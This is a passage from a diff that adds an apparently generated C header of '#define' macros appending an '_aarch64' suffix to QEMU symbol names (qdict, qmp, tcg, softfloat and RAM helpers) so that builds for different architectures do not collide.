qapi_dealloc_start_union qapi_dealloc_start_union_aarch64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_aarch64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_aarch64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_aarch64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_aarch64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_aarch64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_aarch64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_aarch64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_aarch64 +#define qapi_free_boolList qapi_free_boolList_aarch64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_aarch64 +#define qapi_free_int16List qapi_free_int16List_aarch64 +#define qapi_free_int32List qapi_free_int32List_aarch64 +#define qapi_free_int64List qapi_free_int64List_aarch64 +#define qapi_free_int8List qapi_free_int8List_aarch64 +#define qapi_free_intList qapi_free_intList_aarch64 +#define qapi_free_numberList qapi_free_numberList_aarch64 +#define qapi_free_strList qapi_free_strList_aarch64 +#define qapi_free_uint16List qapi_free_uint16List_aarch64 +#define qapi_free_uint32List qapi_free_uint32List_aarch64 +#define qapi_free_uint64List qapi_free_uint64List_aarch64 +#define qapi_free_uint8List qapi_free_uint8List_aarch64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_aarch64 +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_aarch64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_aarch64 +#define qbool_destroy_obj qbool_destroy_obj_aarch64 +#define qbool_from_int qbool_from_int_aarch64 +#define qbool_get_int qbool_get_int_aarch64 +#define qbool_type qbool_type_aarch64 +#define qbus_create qbus_create_aarch64 +#define qbus_create_inplace qbus_create_inplace_aarch64 +#define qbus_finalize qbus_finalize_aarch64 +#define qbus_initfn qbus_initfn_aarch64 +#define qbus_realize qbus_realize_aarch64 +#define 
qdev_create qdev_create_aarch64 +#define qdev_get_type qdev_get_type_aarch64 +#define qdev_register_types qdev_register_types_aarch64 +#define qdev_set_parent_bus qdev_set_parent_bus_aarch64 +#define qdev_try_create qdev_try_create_aarch64 +#define qdict_add_key qdict_add_key_aarch64 +#define qdict_array_split qdict_array_split_aarch64 +#define qdict_clone_shallow qdict_clone_shallow_aarch64 +#define qdict_del qdict_del_aarch64 +#define qdict_destroy_obj qdict_destroy_obj_aarch64 +#define qdict_entry_key qdict_entry_key_aarch64 +#define qdict_entry_value qdict_entry_value_aarch64 +#define qdict_extract_subqdict qdict_extract_subqdict_aarch64 +#define qdict_find qdict_find_aarch64 +#define qdict_first qdict_first_aarch64 +#define qdict_flatten qdict_flatten_aarch64 +#define qdict_flatten_qdict qdict_flatten_qdict_aarch64 +#define qdict_flatten_qlist qdict_flatten_qlist_aarch64 +#define qdict_get qdict_get_aarch64 +#define qdict_get_bool qdict_get_bool_aarch64 +#define qdict_get_double qdict_get_double_aarch64 +#define qdict_get_int qdict_get_int_aarch64 +#define qdict_get_obj qdict_get_obj_aarch64 +#define qdict_get_qdict qdict_get_qdict_aarch64 +#define qdict_get_qlist qdict_get_qlist_aarch64 +#define qdict_get_str qdict_get_str_aarch64 +#define qdict_get_try_bool qdict_get_try_bool_aarch64 +#define qdict_get_try_int qdict_get_try_int_aarch64 +#define qdict_get_try_str qdict_get_try_str_aarch64 +#define qdict_haskey qdict_haskey_aarch64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_aarch64 +#define qdict_iter qdict_iter_aarch64 +#define qdict_join qdict_join_aarch64 +#define qdict_new qdict_new_aarch64 +#define qdict_next qdict_next_aarch64 +#define qdict_next_entry qdict_next_entry_aarch64 +#define qdict_put_obj qdict_put_obj_aarch64 +#define qdict_size qdict_size_aarch64 +#define qdict_type qdict_type_aarch64 +#define qemu_clock_get_us qemu_clock_get_us_aarch64 +#define qemu_clock_ptr qemu_clock_ptr_aarch64 +#define qemu_clocks 
qemu_clocks_aarch64 +#define qemu_get_cpu qemu_get_cpu_aarch64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_aarch64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_aarch64 +#define qemu_get_ram_block qemu_get_ram_block_aarch64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_aarch64 +#define qemu_get_ram_fd qemu_get_ram_fd_aarch64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_aarch64 +#define qemu_host_page_mask qemu_host_page_mask_aarch64 +#define qemu_host_page_size qemu_host_page_size_aarch64 +#define qemu_init_vcpu qemu_init_vcpu_aarch64 +#define qemu_ld_helpers qemu_ld_helpers_aarch64 +#define qemu_log_close qemu_log_close_aarch64 +#define qemu_log_enabled qemu_log_enabled_aarch64 +#define qemu_log_flush qemu_log_flush_aarch64 +#define qemu_loglevel_mask qemu_loglevel_mask_aarch64 +#define qemu_log_vprintf qemu_log_vprintf_aarch64 +#define qemu_oom_check qemu_oom_check_aarch64 +#define qemu_parse_fd qemu_parse_fd_aarch64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_aarch64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_aarch64 +#define qemu_ram_alloc qemu_ram_alloc_aarch64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_aarch64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_aarch64 +#define qemu_ram_free qemu_ram_free_aarch64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_aarch64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_aarch64 +#define qemu_ram_remap qemu_ram_remap_aarch64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_aarch64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_aarch64 +#define qemu_real_host_page_size qemu_real_host_page_size_aarch64 +#define qemu_st_helpers qemu_st_helpers_aarch64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_aarch64 +#define qemu_try_memalign qemu_try_memalign_aarch64 +#define qentry_destroy qentry_destroy_aarch64 +#define qerror_human qerror_human_aarch64 +#define qerror_report 
qerror_report_aarch64 +#define qerror_report_err qerror_report_err_aarch64 +#define qfloat_destroy_obj qfloat_destroy_obj_aarch64 +#define qfloat_from_double qfloat_from_double_aarch64 +#define qfloat_get_double qfloat_get_double_aarch64 +#define qfloat_type qfloat_type_aarch64 +#define qint_destroy_obj qint_destroy_obj_aarch64 +#define qint_from_int qint_from_int_aarch64 +#define qint_get_int qint_get_int_aarch64 +#define qint_type qint_type_aarch64 +#define qlist_append_obj qlist_append_obj_aarch64 +#define qlist_copy qlist_copy_aarch64 +#define qlist_copy_elem qlist_copy_elem_aarch64 +#define qlist_destroy_obj qlist_destroy_obj_aarch64 +#define qlist_empty qlist_empty_aarch64 +#define qlist_entry_obj qlist_entry_obj_aarch64 +#define qlist_first qlist_first_aarch64 +#define qlist_iter qlist_iter_aarch64 +#define qlist_new qlist_new_aarch64 +#define qlist_next qlist_next_aarch64 +#define qlist_peek qlist_peek_aarch64 +#define qlist_pop qlist_pop_aarch64 +#define qlist_size qlist_size_aarch64 +#define qlist_size_iter qlist_size_iter_aarch64 +#define qlist_type qlist_type_aarch64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_aarch64 +#define qmp_input_end_list qmp_input_end_list_aarch64 +#define qmp_input_end_struct qmp_input_end_struct_aarch64 +#define qmp_input_get_next_type qmp_input_get_next_type_aarch64 +#define qmp_input_get_object qmp_input_get_object_aarch64 +#define qmp_input_get_visitor qmp_input_get_visitor_aarch64 +#define qmp_input_next_list qmp_input_next_list_aarch64 +#define qmp_input_optional qmp_input_optional_aarch64 +#define qmp_input_pop qmp_input_pop_aarch64 +#define qmp_input_push qmp_input_push_aarch64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_aarch64 +#define qmp_input_start_list qmp_input_start_list_aarch64 +#define qmp_input_start_struct qmp_input_start_struct_aarch64 +#define qmp_input_type_bool qmp_input_type_bool_aarch64 +#define qmp_input_type_int qmp_input_type_int_aarch64 +#define 
qmp_input_type_number qmp_input_type_number_aarch64 +#define qmp_input_type_str qmp_input_type_str_aarch64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_aarch64 +#define qmp_input_visitor_new qmp_input_visitor_new_aarch64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_aarch64 +#define qmp_output_add_obj qmp_output_add_obj_aarch64 +#define qmp_output_end_list qmp_output_end_list_aarch64 +#define qmp_output_end_struct qmp_output_end_struct_aarch64 +#define qmp_output_first qmp_output_first_aarch64 +#define qmp_output_get_qobject qmp_output_get_qobject_aarch64 +#define qmp_output_get_visitor qmp_output_get_visitor_aarch64 +#define qmp_output_last qmp_output_last_aarch64 +#define qmp_output_next_list qmp_output_next_list_aarch64 +#define qmp_output_pop qmp_output_pop_aarch64 +#define qmp_output_push_obj qmp_output_push_obj_aarch64 +#define qmp_output_start_list qmp_output_start_list_aarch64 +#define qmp_output_start_struct qmp_output_start_struct_aarch64 +#define qmp_output_type_bool qmp_output_type_bool_aarch64 +#define qmp_output_type_int qmp_output_type_int_aarch64 +#define qmp_output_type_number qmp_output_type_number_aarch64 +#define qmp_output_type_str qmp_output_type_str_aarch64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_aarch64 +#define qmp_output_visitor_new qmp_output_visitor_new_aarch64 +#define qobject_decref qobject_decref_aarch64 +#define qobject_to_qbool qobject_to_qbool_aarch64 +#define qobject_to_qdict qobject_to_qdict_aarch64 +#define qobject_to_qfloat qobject_to_qfloat_aarch64 +#define qobject_to_qint qobject_to_qint_aarch64 +#define qobject_to_qlist qobject_to_qlist_aarch64 +#define qobject_to_qstring qobject_to_qstring_aarch64 +#define qobject_type qobject_type_aarch64 +#define qstring_append qstring_append_aarch64 +#define qstring_append_chr qstring_append_chr_aarch64 +#define qstring_append_int qstring_append_int_aarch64 +#define qstring_destroy_obj qstring_destroy_obj_aarch64 +#define 
qstring_from_escaped_str qstring_from_escaped_str_aarch64 +#define qstring_from_str qstring_from_str_aarch64 +#define qstring_from_substr qstring_from_substr_aarch64 +#define qstring_get_length qstring_get_length_aarch64 +#define qstring_get_str qstring_get_str_aarch64 +#define qstring_new qstring_new_aarch64 +#define qstring_type qstring_type_aarch64 +#define ram_block_add ram_block_add_aarch64 +#define ram_size ram_size_aarch64 +#define range_compare range_compare_aarch64 +#define range_covers_byte range_covers_byte_aarch64 +#define range_get_last range_get_last_aarch64 +#define range_merge range_merge_aarch64 +#define ranges_can_merge ranges_can_merge_aarch64 +#define raw_read raw_read_aarch64 +#define raw_write raw_write_aarch64 +#define rcon rcon_aarch64 +#define read_raw_cp_reg read_raw_cp_reg_aarch64 +#define recip_estimate recip_estimate_aarch64 +#define recip_sqrt_estimate recip_sqrt_estimate_aarch64 +#define register_cp_regs_for_features register_cp_regs_for_features_aarch64 +#define register_multipage register_multipage_aarch64 +#define register_subpage register_subpage_aarch64 +#define register_tm_clones register_tm_clones_aarch64 +#define register_types_object register_types_object_aarch64 +#define regnames regnames_aarch64 +#define render_memory_region render_memory_region_aarch64 +#define reset_all_temps reset_all_temps_aarch64 +#define reset_temp reset_temp_aarch64 +#define rol32 rol32_aarch64 +#define rol64 rol64_aarch64 +#define ror32 ror32_aarch64 +#define ror64 ror64_aarch64 +#define roundAndPackFloat128 roundAndPackFloat128_aarch64 +#define roundAndPackFloat16 roundAndPackFloat16_aarch64 +#define roundAndPackFloat32 roundAndPackFloat32_aarch64 +#define roundAndPackFloat64 roundAndPackFloat64_aarch64 +#define roundAndPackFloatx80 roundAndPackFloatx80_aarch64 +#define roundAndPackInt32 roundAndPackInt32_aarch64 +#define roundAndPackInt64 roundAndPackInt64_aarch64 +#define roundAndPackUint64 roundAndPackUint64_aarch64 +#define round_to_inf 
round_to_inf_aarch64 +#define run_on_cpu run_on_cpu_aarch64 +#define s0 s0_aarch64 +#define S0 S0_aarch64 +#define s1 s1_aarch64 +#define S1 S1_aarch64 +#define sa1100_initfn sa1100_initfn_aarch64 +#define sa1110_initfn sa1110_initfn_aarch64 +#define save_globals save_globals_aarch64 +#define scr_write scr_write_aarch64 +#define sctlr_write sctlr_write_aarch64 +#define set_bit set_bit_aarch64 +#define set_bits set_bits_aarch64 +#define set_default_nan_mode set_default_nan_mode_aarch64 +#define set_feature set_feature_aarch64 +#define set_float_detect_tininess set_float_detect_tininess_aarch64 +#define set_float_exception_flags set_float_exception_flags_aarch64 +#define set_float_rounding_mode set_float_rounding_mode_aarch64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_aarch64 +#define set_flush_to_zero set_flush_to_zero_aarch64 +#define set_swi_errno set_swi_errno_aarch64 +#define sextract32 sextract32_aarch64 +#define sextract64 sextract64_aarch64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_aarch64 +#define shift128Right shift128Right_aarch64 +#define shift128RightJamming shift128RightJamming_aarch64 +#define shift32RightJamming shift32RightJamming_aarch64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_aarch64 +#define shift64RightJamming shift64RightJamming_aarch64 +#define shifter_out_im shifter_out_im_aarch64 +#define shortShift128Left shortShift128Left_aarch64 +#define shortShift192Left shortShift192Left_aarch64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_aarch64 +#define size_code_gen_buffer size_code_gen_buffer_aarch64 +#define softmmu_lock_user softmmu_lock_user_aarch64 +#define softmmu_lock_user_string softmmu_lock_user_string_aarch64 +#define softmmu_tget32 softmmu_tget32_aarch64 +#define softmmu_tget8 softmmu_tget8_aarch64 +#define softmmu_tput32 softmmu_tput32_aarch64 +#define softmmu_unlock_user softmmu_unlock_user_aarch64 +#define sort_constraints sort_constraints_aarch64 +#define sp_el0_access 
sp_el0_access_aarch64 +#define spsel_read spsel_read_aarch64 +#define spsel_write spsel_write_aarch64 +#define start_list start_list_aarch64 +#define stb_p stb_p_aarch64 +#define stb_phys stb_phys_aarch64 +#define stl_be_p stl_be_p_aarch64 +#define stl_be_phys stl_be_phys_aarch64 +#define stl_he_p stl_he_p_aarch64 +#define stl_le_p stl_le_p_aarch64 +#define stl_le_phys stl_le_phys_aarch64 +#define stl_phys stl_phys_aarch64 +#define stl_phys_internal stl_phys_internal_aarch64 +#define stl_phys_notdirty stl_phys_notdirty_aarch64 +#define store_cpu_offset store_cpu_offset_aarch64 +#define store_reg store_reg_aarch64 +#define store_reg_bx store_reg_bx_aarch64 +#define store_reg_from_load store_reg_from_load_aarch64 +#define stq_be_p stq_be_p_aarch64 +#define stq_be_phys stq_be_phys_aarch64 +#define stq_he_p stq_he_p_aarch64 +#define stq_le_p stq_le_p_aarch64 +#define stq_le_phys stq_le_phys_aarch64 +#define stq_phys stq_phys_aarch64 +#define string_input_get_visitor string_input_get_visitor_aarch64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_aarch64 +#define string_input_visitor_new string_input_visitor_new_aarch64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_aarch64 +#define strstart strstart_aarch64 +#define strtosz strtosz_aarch64 +#define strtosz_suffix strtosz_suffix_aarch64 +#define stw_be_p stw_be_p_aarch64 +#define stw_be_phys stw_be_phys_aarch64 +#define stw_he_p stw_he_p_aarch64 +#define stw_le_p stw_le_p_aarch64 +#define stw_le_phys stw_le_phys_aarch64 +#define stw_phys stw_phys_aarch64 +#define stw_phys_internal stw_phys_internal_aarch64 +#define sub128 sub128_aarch64 +#define sub16_sat sub16_sat_aarch64 +#define sub16_usat sub16_usat_aarch64 +#define sub192 sub192_aarch64 +#define sub8_sat sub8_sat_aarch64 +#define sub8_usat sub8_usat_aarch64 +#define subFloat128Sigs subFloat128Sigs_aarch64 +#define subFloat32Sigs subFloat32Sigs_aarch64 +#define subFloat64Sigs subFloat64Sigs_aarch64 +#define subFloatx80Sigs 
subFloatx80Sigs_aarch64 +#define subpage_accepts subpage_accepts_aarch64 +#define subpage_init subpage_init_aarch64 +#define subpage_ops subpage_ops_aarch64 +#define subpage_read subpage_read_aarch64 +#define subpage_register subpage_register_aarch64 +#define subpage_write subpage_write_aarch64 +#define suffix_mul suffix_mul_aarch64 +#define swap_commutative swap_commutative_aarch64 +#define swap_commutative2 swap_commutative2_aarch64 +#define switch_mode switch_mode_aarch64 +#define switch_v7m_sp switch_v7m_sp_aarch64 +#define syn_aa32_bkpt syn_aa32_bkpt_aarch64 +#define syn_aa32_hvc syn_aa32_hvc_aarch64 +#define syn_aa32_smc syn_aa32_smc_aarch64 +#define syn_aa32_svc syn_aa32_svc_aarch64 +#define syn_breakpoint syn_breakpoint_aarch64 +#define sync_globals sync_globals_aarch64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_aarch64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_aarch64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_aarch64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_aarch64 +#define syn_data_abort syn_data_abort_aarch64 +#define syn_fp_access_trap syn_fp_access_trap_aarch64 +#define syn_insn_abort syn_insn_abort_aarch64 +#define syn_swstep syn_swstep_aarch64 +#define syn_uncategorized syn_uncategorized_aarch64 +#define syn_watchpoint syn_watchpoint_aarch64 +#define syscall_err syscall_err_aarch64 +#define system_bus_class_init system_bus_class_init_aarch64 +#define system_bus_info system_bus_info_aarch64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_aarch64 +#define table_logic_cc table_logic_cc_aarch64 +#define target_parse_constraint target_parse_constraint_aarch64 +#define target_words_bigendian target_words_bigendian_aarch64 +#define tb_add_jump tb_add_jump_aarch64 +#define tb_alloc tb_alloc_aarch64 +#define tb_alloc_page tb_alloc_page_aarch64 +#define tb_check_watchpoint tb_check_watchpoint_aarch64 +#define tb_find_fast tb_find_fast_aarch64 +#define tb_find_pc tb_find_pc_aarch64 +#define tb_find_slow tb_find_slow_aarch64 +#define tb_flush tb_flush_aarch64 
+#define tb_flush_jmp_cache tb_flush_jmp_cache_aarch64 +#define tb_free tb_free_aarch64 +#define tb_gen_code tb_gen_code_aarch64 +#define tb_hash_remove tb_hash_remove_aarch64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_aarch64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_aarch64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_aarch64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_aarch64 +#define tb_jmp_remove tb_jmp_remove_aarch64 +#define tb_link_page tb_link_page_aarch64 +#define tb_page_remove tb_page_remove_aarch64 +#define tb_phys_hash_func tb_phys_hash_func_aarch64 +#define tb_phys_invalidate tb_phys_invalidate_aarch64 +#define tb_reset_jump tb_reset_jump_aarch64 +#define tb_set_jmp_target tb_set_jmp_target_aarch64 +#define tcg_accel_class_init tcg_accel_class_init_aarch64 +#define tcg_accel_type tcg_accel_type_aarch64 +#define tcg_add_param_i32 tcg_add_param_i32_aarch64 +#define tcg_add_param_i64 tcg_add_param_i64_aarch64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_aarch64 +#define tcg_allowed tcg_allowed_aarch64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_aarch64 +#define tcg_commit tcg_commit_aarch64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_aarch64 +#define tcg_constant_folding tcg_constant_folding_aarch64 +#define tcg_const_i32 tcg_const_i32_aarch64 +#define tcg_const_i64 tcg_const_i64_aarch64 +#define tcg_const_local_i32 tcg_const_local_i32_aarch64 +#define tcg_const_local_i64 tcg_const_local_i64_aarch64 +#define tcg_context_init tcg_context_init_aarch64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_aarch64 +#define tcg_cpu_exec tcg_cpu_exec_aarch64 +#define tcg_current_code_size tcg_current_code_size_aarch64 +#define tcg_dump_info tcg_dump_info_aarch64 +#define tcg_dump_ops tcg_dump_ops_aarch64 +#define tcg_exec_all tcg_exec_all_aarch64 +#define tcg_find_helper tcg_find_helper_aarch64 
+#define tcg_func_start tcg_func_start_aarch64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_aarch64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_aarch64 +#define tcg_gen_add_i32 tcg_gen_add_i32_aarch64 +#define tcg_gen_add_i64 tcg_gen_add_i64_aarch64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_aarch64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_aarch64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_aarch64 +#define tcg_gen_and_i32 tcg_gen_and_i32_aarch64 +#define tcg_gen_and_i64 tcg_gen_and_i64_aarch64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_aarch64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_aarch64 +#define tcg_gen_br tcg_gen_br_aarch64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_aarch64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_aarch64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_aarch64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_aarch64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_aarch64 +#define tcg_gen_callN tcg_gen_callN_aarch64 +#define tcg_gen_code tcg_gen_code_aarch64 +#define tcg_gen_code_common tcg_gen_code_common_aarch64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_aarch64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_aarch64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_aarch64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_aarch64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_aarch64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_aarch64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_aarch64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_aarch64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_aarch64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_aarch64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_aarch64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_aarch64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_aarch64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_aarch64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_aarch64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_aarch64 +#define tcg_gen_ldst_op_i32 
tcg_gen_ldst_op_i32_aarch64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_aarch64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_aarch64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_aarch64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_aarch64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_aarch64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_aarch64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_aarch64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_aarch64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_aarch64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_aarch64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_aarch64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_aarch64 +#define tcg_gen_not_i32 tcg_gen_not_i32_aarch64 +#define tcg_gen_op0 tcg_gen_op0_aarch64 +#define tcg_gen_op1i tcg_gen_op1i_aarch64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_aarch64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_aarch64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_aarch64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_aarch64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_aarch64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_aarch64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_aarch64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_aarch64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_aarch64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_aarch64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_aarch64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_aarch64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_aarch64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_aarch64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_aarch64 +#define tcg_gen_or_i32 tcg_gen_or_i32_aarch64 +#define tcg_gen_or_i64 tcg_gen_or_i64_aarch64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_aarch64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_aarch64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_aarch64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_aarch64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_aarch64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_aarch64 +#define tcg_gen_rotli_i32 
tcg_gen_rotli_i32_aarch64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_aarch64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_aarch64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_aarch64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_aarch64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_aarch64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_aarch64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_aarch64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_aarch64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_aarch64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_aarch64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_aarch64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_aarch64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_aarch64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_aarch64 +#define tcg_gen_st_i32 tcg_gen_st_i32_aarch64 +#define tcg_gen_st_i64 tcg_gen_st_i64_aarch64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_aarch64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_aarch64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_aarch64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_aarch64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_aarch64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_aarch64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_aarch64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_aarch64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_aarch64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_aarch64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_aarch64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_aarch64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_aarch64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_aarch64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_aarch64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_aarch64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_aarch64 +#define tcg_handle_interrupt tcg_handle_interrupt_aarch64 +#define tcg_init tcg_init_aarch64 +#define tcg_invert_cond tcg_invert_cond_aarch64 +#define tcg_la_bb_end 
tcg_la_bb_end_aarch64 +#define tcg_la_br_end tcg_la_br_end_aarch64 +#define tcg_la_func_end tcg_la_func_end_aarch64 +#define tcg_liveness_analysis tcg_liveness_analysis_aarch64 +#define tcg_malloc tcg_malloc_aarch64 +#define tcg_malloc_internal tcg_malloc_internal_aarch64 +#define tcg_op_defs_org tcg_op_defs_org_aarch64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_aarch64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_aarch64 +#define tcg_optimize tcg_optimize_aarch64 +#define tcg_out16 tcg_out16_aarch64 +#define tcg_out32 tcg_out32_aarch64 +#define tcg_out64 tcg_out64_aarch64 +#define tcg_out8 tcg_out8_aarch64 +#define tcg_out_addi tcg_out_addi_aarch64 +#define tcg_out_branch tcg_out_branch_aarch64 +#define tcg_out_brcond32 tcg_out_brcond32_aarch64 +#define tcg_out_brcond64 tcg_out_brcond64_aarch64 +#define tcg_out_bswap32 tcg_out_bswap32_aarch64 +#define tcg_out_bswap64 tcg_out_bswap64_aarch64 +#define tcg_out_call tcg_out_call_aarch64 +#define tcg_out_cmp tcg_out_cmp_aarch64 +#define tcg_out_ext16s tcg_out_ext16s_aarch64 +#define tcg_out_ext16u tcg_out_ext16u_aarch64 +#define tcg_out_ext32s tcg_out_ext32s_aarch64 +#define tcg_out_ext32u tcg_out_ext32u_aarch64 +#define tcg_out_ext8s tcg_out_ext8s_aarch64 +#define tcg_out_ext8u tcg_out_ext8u_aarch64 +#define tcg_out_jmp tcg_out_jmp_aarch64 +#define tcg_out_jxx tcg_out_jxx_aarch64 +#define tcg_out_label tcg_out_label_aarch64 +#define tcg_out_ld tcg_out_ld_aarch64 +#define tcg_out_modrm tcg_out_modrm_aarch64 